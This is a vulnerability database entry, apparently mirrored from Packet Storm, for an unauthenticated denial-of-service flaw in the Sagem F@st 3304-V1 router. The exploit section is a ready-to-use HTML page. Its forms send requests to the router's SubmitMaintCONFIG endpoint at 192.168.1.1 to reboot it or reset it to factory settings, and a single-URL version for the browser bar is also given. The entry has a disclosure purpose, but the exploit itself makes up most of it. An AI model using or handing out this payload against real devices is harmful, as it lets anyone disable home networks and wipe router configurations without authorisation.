ID

VAR-E-201407-0115


TITLE

Sagem F@st 3304-V1 Denial Of Service

Trust: 0.5

sources: PACKETSTORM: 127641

DESCRIPTION

Sagem F@st 3304-V1 suffers from a denial of service vulnerability.

Trust: 0.5

sources: PACKETSTORM: 127641

AFFECTED PRODUCTS

vendor:sagemmodel:f@stscope:eqversion:3304-v1

Trust: 0.5

sources: PACKETSTORM: 127641

EXPLOIT

# Title : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage : http://www.sagemcom.com
# Tested on : Firefox, Google Chrome
# Tested Router : Sagem F@st 3304-V1
# Date : 2014-07-26
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne

# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:

<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
</FORM>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
</FORM>
</body>
</html>
Reset to factory configuration :
--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar

Trust: 0.5

sources: PACKETSTORM: 127641

EXPLOIT HASH

LOCAL

SOURCE

md5: 4bcd669d8f277ba21aea31790d6fe700
sha-1: 24cbafd864a77dab021d9d75db946c3960fa54b0
sha-256: 089e8d0a65adc5f8eab0b71bb5f705b88968a278bc59b169bca15e150f1b2b50
md5: 4bcd669d8f277ba21aea31790d6fe700

Trust: 0.5

sources: PACKETSTORM: 127641

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 127641

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 127641

CREDITS

Z3ro0ne

Trust: 0.5

sources: PACKETSTORM: 127641

EXTERNAL IDS

db:PACKETSTORMid:127641

Trust: 0.5

sources: PACKETSTORM: 127641

SOURCES

db:PACKETSTORMid:127641

LAST UPDATE DATE

2022-07-27T09:18:47.623000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:127641date:2014-07-28T12:02:22